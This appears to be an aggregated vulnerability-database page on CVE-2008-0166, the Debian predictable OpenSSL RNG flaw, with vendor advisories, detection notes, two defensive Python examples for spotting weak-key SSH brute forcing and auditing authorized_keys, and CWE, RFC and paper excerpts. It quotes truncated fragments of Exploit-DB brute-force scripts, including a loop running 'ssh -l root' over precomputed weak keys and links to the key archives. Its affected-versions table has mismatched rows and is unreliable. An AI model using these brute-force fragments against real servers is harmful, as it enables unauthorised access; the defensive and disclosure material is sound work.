CVE-2008-0166
Published 2008-05-13
Priority: P2 · 60 · high · 7.5 · CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT · EPSS 70.72% (99.3rd percentile)
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
Affected (24 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | openssh | < openssh 4.7p1-9 (bookworm) | openssh 4.7p1-9 (bookworm) |
| debian | openssh | < openssh 1:4.7p1-10 (bookworm) | openssh 1:4.7p1-10 (bookworm) |
| debian | openssl | < openssh 4.7p1-9 (bookworm) | openssh 4.7p1-9 (bookworm) |
| openbsd | openssh | >= 0 < 1:4.7p1-10 | 1:4.7p1-10 |
| openbsd | openssh | >= 0 < 4.7p1-9 | 4.7p1-9 |
| openbsd | openssh | >= 0 < 1:4.7p1-10 | 1:4.7p1-10 |
| openbsd | openssh | >= 0 < 4.7p1-9 | 4.7p1-9 |
| openbsd | openssh | >= 0 < 1:4.7p1-10 | 1:4.7p1-10 |
| openbsd | openssh | >= 0 < 4.7p1-9 | 4.7p1-9 |
| openbsd | openssh | >= 0 < 1:4.7p1-10 | 1:4.7p1-10 |
| openbsd | openssh | >= 0 < 4.7p1-9 | 4.7p1-9 |
| openssl | openssl | >= 0 < 0.9.8g-9 | 0.9.8g-9 |
| openssl | openssl | >= 0 < 0.9.8g-9 | 0.9.8g-9 |
| openssl | openssl | >= 0 < 0.9.8g-9 | 0.9.8g-9 |
| openssl | openssl | >= 0 < 0.9.8g-9 | 0.9.8g-9 |
| openssl | openssl | 0.9.8c-1 – 0.9.8g | — |
| ubuntu | linux | — | — |
| ubuntu | linux | — | — |
| ubuntu | linux | — | — |
Detection & IOCs (extracted from sources)
- CVE-2008-0166 (Debian Predictable RNG) produces a severely limited keyspace for RSA/DSA keys generated on affected Debian/Ubuntu systems. Detect use of weak predictable SSH private keys by comparing against the known set of ~32,768 possible keys for each key length/type combination.
- Exploit tooling for CVE-2008-0166 iterates through a directory of pre-generated weak SSH private keys and attempts authentication against a target host using multiple threads. Monitor for rapid sequential SSH authentication attempts using different key files from the same source IP.
- The brute-force exploit (exploit-db 5622) batches multiple weak SSH private keys per connection attempt against root. Alert on SSH login attempts to the root account using public-key authentication in rapid succession.
- TLS certificates generated on Debian-based systems between September 2006 and May 2008 may use predictable weak keys. Audit TLS certificates in use and check key fingerprints against published lists of compromised Debian weak keys.
- The exploit script (exploit-db 5720) requires a local directory of pre-generated weak Debian SSH private keys as input; detection depends on the attacker having obtained the weak key set externally before launching the attack.
- The exploit-db 5622 script estimates compromise in under 20 minutes, indicating the full weak-key space can be exhausted rapidly and detection windows are short.
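The second and third detection notes above describe the trace a weak-key brute force leaves on the target: many public-key authentication attempts from one source address in a short time, each offering a different key, typically against root. The following is an added example written for this page, not code from any of the sources or tools it lists. It implements that check over constructed sshd-style log lines; it assumes sshd is logging at LogLevel VERBOSE so that publickey attempts carry the key fingerprint, and the window and threshold values are illustrative defaults, not figures from the advisories.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd log lines (not real captures). With LogLevel
# VERBOSE, sshd records the offered key fingerprint on publickey attempts,
# which is what lets us count distinct keys per source address.
SAMPLE_LOG = """\
May 15 10:00:01 bastion sshd[4101]: Failed publickey for root from 198.51.100.7 port 40001 ssh2: RSA SHA256:k1aaaa
May 15 10:00:01 bastion sshd[4102]: Failed publickey for root from 198.51.100.7 port 40002 ssh2: RSA SHA256:k2bbbb
May 15 10:00:02 bastion sshd[4103]: Failed publickey for root from 198.51.100.7 port 40003 ssh2: RSA SHA256:k3cccc
May 15 10:00:02 bastion sshd[4104]: Failed publickey for root from 198.51.100.7 port 40004 ssh2: RSA SHA256:k4dddd
May 15 10:00:03 bastion sshd[4105]: Failed publickey for root from 198.51.100.7 port 40005 ssh2: RSA SHA256:k5eeee
May 15 10:00:03 bastion sshd[4106]: Accepted publickey for root from 198.51.100.7 port 40006 ssh2: RSA SHA256:k6ffff
May 15 10:05:00 bastion sshd[4107]: Failed publickey for alice from 192.0.2.9 port 50001 ssh2: RSA SHA256:zz0001
May 15 10:30:00 bastion sshd[4108]: Failed publickey for alice from 192.0.2.9 port 50002 ssh2: RSA SHA256:zz0002
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) publickey for (?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2: (?P<fp>\S+ \S+)$"
)


def parse_sshd_log(text, year=2008):
    """Extract (timestamp, result, user, ip, fingerprint) tuples.

    Syslog timestamps carry no year, so the caller supplies one."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"], m["fp"]))
    return events


def find_key_spraying(events, window_seconds=60, min_distinct_keys=5):
    """Flag source addresses that presented at least min_distinct_keys
    different public keys inside any window_seconds-long window.

    Returns {ip: {"distinct_keys": n, "users": [...], "root_success": bool}}.
    A successful root login from a flagged address is the case that needs
    immediate response: the server's key was in the attacker's key set."""
    by_ip = defaultdict(list)
    for ts, result, user, ip, fp in events:
        by_ip[ip].append((ts, result, user, fp))

    alerts = {}
    for ip, items in by_ip.items():
        items.sort(key=lambda e: e[0])
        best, start = 0, 0
        for end in range(len(items)):
            # Slide the window start forward until the span fits window_seconds.
            while (items[end][0] - items[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = len({e[3] for e in items[start:end + 1]})
            best = max(best, distinct)
        if best >= min_distinct_keys:
            alerts[ip] = {
                "distinct_keys": best,
                "users": sorted({e[2] for e in items}),
                "root_success": any(e[1] == "Accepted" and e[2] == "root" for e in items),
            }
    return alerts


if __name__ == "__main__":
    for ip, info in find_key_spraying(parse_sshd_log(SAMPLE_LOG)).items():
        print(ip, info)
```

Counting distinct fingerprints rather than raw failures is what separates this from an ordinary password brute force or a misconfigured client retrying one key; the `root_success` flag turns a detection into an incident, because the key that worked is by construction in the attacker's precomputed set and must be replaced along with every other key generated on the affected host.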
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | 2.0 | 7.8 | HIGH | AV:N/AC:L/Au:N/C:C/I:N/A:N |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | HIGH | — |
| vendor_redhat | — | 7.5 | HIGH | — |
| vendor_ubuntu | — | 7.5 | HIGH | — |
Ubuntu: OpenSSH update (vendor_ubuntu · 2008-05-20 · CVE-2008-0166)
USN-612-2 introduced protections for OpenSSH, related to the OpenSSL
vulnerabilities addressed by USN-612-1. This update provides the
corresponding updates for OpenSSH in Ubuntu 6.06 LTS. While the OpenSSL
in Ubuntu 6.06 is not vulnerable, this update will block weak keys
generated on systems that may have been affected themselves.
Original advisory details:
A weakness has been discovered in the random number generator used
by OpenSSL on Debian and Ubuntu systems. As a result of this
weakness, certain encryption keys are much more common than they
should be, such that an attacker could guess the key through a
brute-force attack given minimal knowledge of the system. This
particularly affects the use of encryption keys in OpenSSH, OpenVPN
an
Ubuntu: ssl-cert vulnerability (vendor_ubuntu · 2008-05-14 · CVSS 7.5 · CVE-2008-0166 [HIGH])
USN-612-1 fixed vulnerabilities in openssl. This update provides the
corresponding updates for ssl-cert -- potentially compromised snake-oil
SSL certificates will be regenerated.
Original advisory details:
A weakness has been discovered in the random number generator used
by OpenSSL on Debian and Ubuntu systems. As a result of this
weakness, certain encryption keys are much more common than they
should be, such that an attacker could guess the key through a
brute-force attack given minimal knowledge of the system. This
particularly affects the use of encryption keys in OpenSSH, OpenVPN
and SSL certificates.
This vulnerability only affects operating systems which (like
Ubuntu) are based on Debian. However, other systems can
Ubuntu: OpenSSL vulnerability (vendor_ubuntu · 2008-05-13 · CVSS 7.5 · CVE-2008-0166 [HIGH])
A weakness has been discovered in the random number generator used
by OpenSSL on Debian and Ubuntu systems. As a result of this
weakness, certain encryption keys are much more common than they
should be, such that an attacker could guess the key through a
brute-force attack given minimal knowledge of the system. This
particularly affects the use of encryption keys in OpenSSH, OpenVPN
and SSL certificates.
This vulnerability only affects operating systems which (like
Ubuntu) are based on Debian. However, other systems can be
indirectly affected if weak keys are imported into them.
We consider this an extremely serious vulnerability, and urge all
users to act immediately to secure their systems. (CVE-2008-0166)
== Who is affect
Ubuntu: OpenVPN vulnerability (vendor_ubuntu · 2008-05-13 · CVE-2008-0166)
A weakness has been discovered in the random number generator used
by OpenSSL on Debian and Ubuntu systems. As a result of this
weakness, certain encryption keys are much more common than they
should be, such that an attacker could guess the key through a
brute-force attack given minimal knowledge of the system. This
particularly affects the use of shared encryption keys and SSL/TLS
certificates in OpenVPN.
This vulnerability only affects operating systems which (like
Ubuntu) are based on Debian. However, other systems can be
indirectly affected if weak keys are imported into them.
We consider this an extremely serious vulnerability, and urge all
users to act immediately to secure their systems.
Instructions: Once the update
Ubuntu: OpenSSH vulnerability (vendor_ubuntu · 2008-05-13 · CVE-2008-0166)
A weakness has been discovered in the random number generator used
by OpenSSL on Debian and Ubuntu systems. As a result of this
weakness, certain encryption keys are much more common than they
should be, such that an attacker could guess the key through a
brute-force attack given minimal knowledge of the system. This
particularly affects the use of encryption keys in OpenSSH.
This vulnerability only affects operating systems which (like
Ubuntu) are based on Debian. However, other systems can be
indirectly affected if weak keys are imported into them.
We consider this an extremely serious vulnerability, and urge all
users to act immediately to secure their systems.
Instructions: Updating your system:
1. Install the security u
Debian: openssh, CVE-2008-0166 (vendor_debian · 2008 · CVSS 7.5 [HIGH])
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
Scope: local
bookworm: resolved (fixed in 4.7p1-9)
bullseye: resolved (fixed in 4.7p1-9)
forky: resolved (fixed in 4.7p1-9)
sid: resolved (fixed in 4.7p1-9)
trixie: resolved (fixed in 4.7p1-9)
Debian: openssh, CVE-2008-2285 (vendor_debian · 2008 · CVSS 7.5 [HIGH])
The ssh-vulnkey tool on Ubuntu Linux 7.04, 7.10, and 8.04 LTS does not recognize authorized_keys lines that contain options, which makes it easier for remote attackers to exploit CVE-2008-0166 by guessing a key that was not identified by this tool.
Scope: local
bookworm: resolved (fixed in 1:4.7p1-10)
bullseye: resolved (fixed in 1:4.7p1-10)
forky: resolved (fixed in 1:4.7p1-10)
sid: resolved (fixed in 1:4.7p1-10)
trixie: resolved (fixed in 1:4.7p1-10)
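The CVE-2008-2285 entry above concerns a key scanner that skipped authorized_keys lines carrying a leading options field, so a weak key installed with `command="..."` or `no-pty` restrictions went unreported. The following is an added example written for this page, not code from ssh-vulnkey or any project the page mentions. It audits authorized_keys content against a fingerprint blocklist and shows the difference an options-aware parser makes; the key blobs and the blocklist are constructed placeholders (not real weak keys), the SSH wire layout of the blobs is the standard one, and the fingerprint format follows the `SHA256:<base64>` convention that `ssh-keygen -l` prints.

```python
import base64
import hashlib

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def _ssh_string(b):
    """Length-prefixed string as used in the SSH wire format."""
    return len(b).to_bytes(4, "big") + b


def _make_blob(key_type, *fields):
    """Build a base64 public-key blob with the SSH wire layout."""
    raw = _ssh_string(key_type.encode()) + b"".join(_ssh_string(f) for f in fields)
    return base64.b64encode(raw).decode()


# Constructed placeholder keys: the numbers are tiny and meaningless, they
# exist only so that the fingerprints below are reproducible offline.
WEAK_BLOB = _make_blob("ssh-rsa", b"\x01\x00\x01", b"\x00\xc3\x5a\x91\x77")
GOOD_BLOB = _make_blob("ssh-ed25519", bytes(range(32)))


def fingerprint(blob_b64):
    """SHA256 fingerprint as OpenSSH prints it: 'SHA256:<base64 without padding>'."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


# Stand-in for the published weak-key fingerprint lists (constructed, not real).
WEAK_FINGERPRINTS = {fingerprint(WEAK_BLOB)}

SAMPLE_AUTHORIZED_KEYS = f"""\
# constructed sample authorized_keys
ssh-rsa {WEAK_BLOB} weak@example
command="/usr/bin/rsync --server",no-pty ssh-rsa {WEAK_BLOB} weak-with-options@example
ssh-ed25519 {GOOD_BLOB} fine@example
"""


def _tokenize(line):
    """Split on whitespace but keep double-quoted option values intact,
    e.g. command="some program with args"."""
    tokens, cur, in_quote = [], [], False
    for ch in line:
        if ch == '"':
            in_quote = not in_quote
            cur.append(ch)
        elif ch.isspace() and not in_quote:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_authorized_keys_line(line, options_aware=True):
    """Return {"options", "type", "blob", "comment"} or None for lines that
    hold no key. With options_aware=False the leading options field is not
    understood, which reproduces the ssh-vulnkey gap described by CVE-2008-2285."""
    tokens = _tokenize(line.strip())
    if not tokens or tokens[0].startswith("#"):
        return None
    options = None
    if tokens[0] not in KEY_TYPES and options_aware:
        options, tokens = tokens[0], tokens[1:]
    if len(tokens) < 2 or tokens[0] not in KEY_TYPES:
        return None
    return {"options": options, "type": tokens[0], "blob": tokens[1],
            "comment": " ".join(tokens[2:])}


def audit_authorized_keys(text, weak_fps, options_aware=True):
    """Return (line number, key type, comment) for every key whose
    fingerprint is on the blocklist."""
    flagged = []
    for n, line in enumerate(text.splitlines(), 1):
        entry = parse_authorized_keys_line(line, options_aware)
        if entry and fingerprint(entry["blob"]) in weak_fps:
            flagged.append((n, entry["type"], entry["comment"]))
    return flagged


if __name__ == "__main__":
    print("options-aware:", audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_FINGERPRINTS))
    print("naive        :", audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_FINGERPRINTS, False))
```

The naive mode flags only line 2; the options-aware mode also catches line 3, the restricted key that the original tool missed. A real audit would load the published weak-key fingerprint sets into `WEAK_FINGERPRINTS` and run over every user's authorized_keys file as well as host keys and TLS certificate keys.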
Red Hat: CVE-2008-0166 (vendor_redhat · CVSS 7.5 [HIGH])
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
Statement: Not vulnerable. This flaw was caused by a third-party vendor patch to the OpenSSL library. This patch has never been used by Red Hat, and this issue therefore does not affect any Fedora, Red Hat, or upstream supplied OpenSSL packages.
GHSA-9c93-c5gr-q8j9 for CVE-2008-2285 (ghsa_unreviewed · 2022-05-01 · CVSS 7.5 [HIGH])
The ssh-vulnkey tool on Ubuntu Linux 7.04, 7.10, and 8.04 LTS does not recognize authorized_keys lines that contain options, which makes it easier for remote attackers to exploit CVE-2008-0166 by guessing a key that was not identified by this tool.
GHSA-4xrg-5554-qffr for CVE-2008-0166 (ghsa_unreviewed · 2022-05-01 · [HIGH] · CWE-338)
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
GHSA-cq23-cxpr-f49x for CVE-2008-3280 (ghsa_unreviewed · 2022-04-21 · CVSS 7.5 [HIGH] · CWE-338)
It was found that various OpenID Providers (OPs) had TLS Server Certificates that used weak keys, as a result of the Debian Predictable Random Number Generator (CVE-2008-0166). In combination with the DNS Cache Poisoning issue (CVE-2008-1447) and the fact that almost all SSL/TLS implementations do not consult CRLs (currently an untracked issue), this means that it is impossible to rely on these OPs.
OSV: CVE-2008-2285 (osv · 2008-05-18 · CVSS 7.5 [HIGH])
The ssh-vulnkey tool on Ubuntu Linux 7.04, 7.10, and 8.04 LTS does not recognize authorized_keys lines that contain options, which makes it easier for remote attackers to exploit CVE-2008-0166 by guessing a key that was not identified by this tool.
OSV: CVE-2008-0166 (osv · 2008-05-13 · CVSS 7.5 [HIGH])
OpenSSL 0.9.8c-1 up to versions before 0.9.8g-9 on Debian-based operating systems uses a random number generator that generates predictable numbers, which makes it easier for remote attackers to conduct brute force guessing attacks against cryptographic keys.
No detection rules found.
Exploit-DB: OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (exploitdb · 2008-06-01 · CVE-2008-3280)
OpenSSL 0.9.8c-1 [[port] [threads]]'
print ' : Path to SSH privatekeys (ex. /home/john/keys) without final slash'
print ' : The victim host'
print ' : The user of the victim host'
print ' [port]: The SSH port of the victim host (default 22)'
print ' [threads]: Number of threads (default 4) Too big numer is bad'
sys.exit(1)
dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]
if len(sys.argv) <= 4:
port='22'
threads=4
else:
if len(sys.argv) <=5:
port=sys.argv[4]
threads = 4
else:
port=sys.argv[4]
threads = sys.argv[5]
ListDir = os.listdir(dir)
QueueDir=Queue.Queue()
TheEnd = End()
for i in range(len(ListDir)):
if ListDir[i].find('.pub') == -1:
QueueDir.put(ListDir[i])
initsize = QueueDir.qsize()
tested = 0
for i in range(0,int(threads)):
Connection(QueueDir,TheEnd,dir,host,user,p
Exploit-DB: OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby) (exploitdb · 2008-05-16 · CVE-2008-0166)
OpenSSL 0.9.8c-1
#
# This tool helps to find user accounts with weak SSH keys
# that should be regenerated with an unaffected version
# of openssl.
#
# You will need the precalculated keys provided by HD Moore
# See http://metasploit.com/users/hdm/tools/debian-openssl/
# for further information.
#
# Common Keys:
#
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
# https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
#
#
# Usage:
# debian_openssh_key_test.rb
#
# E-DB Note: See here for an update ~ https://github.com/offensive-security/exploitdb/pull/76/files
#
require 'thread'
THREADCOUNT = 10
KEYSPERCONNECT = 3
queue = Queue.new
thre
Exploit-DB: OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (exploitdb · 2008-05-15 · CVE-2008-0166)
OpenSSL 0.9.8c-1 $keysPerConnect) {
system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i
".$_ } @a)." ".$ARGV[1]);
@a = ();
}
}
5. Enjoy the shell after some minutes (less than 20 minutes)
Regards,
Markus Mueller
[email protected]
# milw0rm.com [2008-05-15]
RFC: Internet X.509 Public Key Infrastructure -- Certificate Management Protocol (CMP) (rfc · 2025-07-01)
Internet Engineering Task Force (IETF) H. Brockhaus
Request for Comments: 9810 D. von Oheimb
Obsoletes: 4210, 9480 Siemens
Updates: 5912 M. Ounsworth
Category: Standards Track J. Gray
ISSN: 2070-1721 Entrust
July 2025
Internet X.509 Public Key Infrastructure -- Certificate Management
Protocol (CMP)
Abstract
This document describes the Internet X.509 Public Key Infrastructure
(PKI) Certificate Management Protocol (CMP). Protocol messages are
defined for X.509v3 certificate creation and management. CMP
provides interactions between client systems and PKI components such
as a Registration Authority (RA) and a Certification Authority (CA).
This document adds support for management of certificates containing
a Key Encapsulation Mechanism (KEM) public key and uses EnvelopedData
instead
RFC: Conveying a Certificate Signing Request (CSR) in a Secure Zero-Touch Provisioning (SZTP) Bootstrapping Request (rfc · 2024-10-01)
Internet Engineering Task Force (IETF) K. Watsen
Request for Comments: 9646 Watsen Networks
Updates: 8572 R. Housley
Category: Standards Track Vigil Security
ISSN: 2070-1721 S. Turner
sn3rd
October 2024
Conveying a Certificate Signing Request (CSR) in a Secure Zero-Touch
Provisioning (SZTP) Bootstrapping Request
Abstract
This document extends the input to the "get-bootstrapping-data" RPC
defined in RFC 8572 to include an optional certificate signing
request (CSR), enabling a bootstrapping device to additionally obtain
an identity certificate (e.g., a Local Device Identifier (LDevID)
from IEEE 802.1AR) as part of the "onboarding information" response
provided in the RPC-reply.
Status of This Memo
This is an Internet Standards Track document.
This document is a product of the Inte
RFC: Certificate Management Protocol (CMP) Updates (rfc · 2023-11-01)
Internet Engineering Task Force (IETF) H. Brockhaus
Request for Comments: 9480 D. von Oheimb
Updates: 4210, 5912, 6712 Siemens
Category: Standards Track J. Gray
ISSN: 2070-1721 Entrust
November 2023
Certificate Management Protocol (CMP) Updates
Abstract
This document contains a set of updates to the syntax of Certificate
Management Protocol (CMP) version 2 and its HTTP transfer mechanism.
This document updates RFCs 4210, 5912, and 6712.
The aspects of CMP updated in this document are using EnvelopedData
instead of EncryptedValue, clarifying the handling of p10cr messages,
improving the crypto agility, as well as adding new general message
types, extended key usages to identify certificates for use with CMP,
and well-known URI path segments.
CMP version 3 is introduced to enable s
arXiv: One Bad Apple Spoils the Barrel: Understanding the Security Risks Introduced by Third-Party Components in IoT Firmware (arxiv_fulltext · 2022-12-29)
## Abstract
Currently, the development of IoT firmware heavily depends on third-party components (TPCs) to improve development efficiency. Nevertheless, TPCs are not secure, and the vulnerabilities in TPCs will influence the security of IoT firmware. Existing works pay less attention to the vulnerabilities caused by TPCs, and we still lack a comprehensive understanding of the security impact of TPC vulnerability against firmware. To fill in the knowledge gap, we design and implement , which leverages syntactical features and control-flow graph features to detect the TPCs in firmware, and then recognizes the corresponding vulnerabilities. Based on , we present the first l
arXiv: An Algorithm to Find Optimal Attack Paths in Nondeterministic Scenarios (arxiv_fulltext · 2013-06-17)
AISec'11, October 21, 2011, Chicago, Illinois, USA.
978-1-4503-1003-1/11/10
Carlos Sarraute
Core Security Technologies and ITBA
Buenos Aires, Argentina
[email protected]
Gerardo Richarte
Core Security Technologies
Buenos Aires, Argentina
[email protected]
Jorge Lucángeli Obes
Universidad de Buenos Aires
Argentina
[email protected]
30 June 2011
## Abstract
As penetration testing frameworks have evolved and have become more complex,
the problem of controlling automatically the pentesting tool
has become an important question.
This can be naturally addressed as an attack planning problem.
Previous approaches to this problem were based
on modeling the actions and assets in the PDDL
CWE-337: Predictable Seed in Pseudo-Random Number Generator (PRNG) (mitre_cwe · CVSS 7.5 [HIGH])
A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time.
The use of predictable seeds significantly reduces the number of possible seeds that an attacker would need to test in order to predict which random numbers will be generated by the PRNG.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Common Consequences:
Scope: Other. Impact: Varies by Context.
Detection Methods:
Automated Static Analysis: Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or b
OWASP: Testing for Weak Transport Layer Security (owasp)
# Testing for Weak Transport Layer Security
|ID |
|------------|
|WSTG-CRYP-01|
## Summary
When information is sent between the client and the server, it must be encrypted and protected in order to prevent an attacker from being able to read or modify it. This is most commonly done using HTTPS, which uses the [Transport Layer Security (TLS)](https://en.wikipedia.org/wiki/Transport_Layer_Security) protocol, a replacement for the older Secure Socket Layer (SSL) protocol. TLS also provides a way for the server to demonstrate to the client that they have connected to the correct server, by presenting a trusted digital certificate.
Over the years there have been a large number of cryptographic weaknesses identified in the SSL and TLS protocols, as well as in the ciphers that they use. Addit
CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) (mitre_cwe)
The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong.
When a non-cryptographic PRNG is used in a cryptographic context, it can expose the cryptography to certain types of attacks. Often a pseudo-random number generator (PRNG) is not designed for cryptography. Sometimes a mediocre source of randomness is sufficient or preferable for algorithms that use random numbers. Weak generators generally take less processing power and/or do not use the precious, finite, entropy sources on a system. While such PRNGs might have very useful features, these same features could be used to break the cryptography.
Modes of Introduction:
Phase: Arc
CWE-330: Use of Insufficiently Random Values (mitre_cwe)
The product uses insufficiently random numbers or values in a security context that depends on unpredictable numbers.
Background: Computers are deterministic machines, and as such are unable to produce true randomness. Pseudo-Random Number Generators (PRNGs) approximate randomness algorithmically, starting with a seed from which subsequent values are calculated. There are two types of PRNGs: statistical and cryptographic. Statistical PRNGs provide useful statistical properties, but their output is highly predictable and forms an easy to reproduce numeric stream that is unsuitable for use in cases where security depends on generated values being unpredictable. Cryptographic PRNGs address this problem by generating output that is more difficult
References
- http://metasploit.com/users/hdm/tools/debian-openssl/
- http://secunia.com/advisories/30136
- http://secunia.com/advisories/30220
- http://secunia.com/advisories/30221
- http://secunia.com/advisories/30231
- http://secunia.com/advisories/30239
- http://secunia.com/advisories/30249
- http://sourceforge.net/mailarchive/forum.php?thread_name=48367252.7070603%40shemesh.biz&forum_name=rsyncrypto-devel
- http://www.debian.org/security/2008/dsa-1571
- http://www.debian.org/security/2008/dsa-1576
- http://www.kb.cert.org/vuls/id/925211
- http://www.securityfocus.com/archive/1/492112/100/0/threaded
- http://www.securityfocus.com/bid/29179
- http://www.securitytracker.com/id?1020017
- http://www.ubuntu.com/usn/usn-612-1
- http://www.ubuntu.com/usn/usn-612-2
- http://www.ubuntu.com/usn/usn-612-3
- http://www.ubuntu.com/usn/usn-612-4
- http://www.ubuntu.com/usn/usn-612-7
- http://www.us-cert.gov/cas/techalerts/TA08-137A.html
- https://16years.secvuln.info
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42375
- https://news.ycombinator.com/item?id=40333169
- https://www.exploit-db.com/exploits/5622
- https://www.exploit-db.com/exploits/5632
- https://www.exploit-db.com/exploits/5720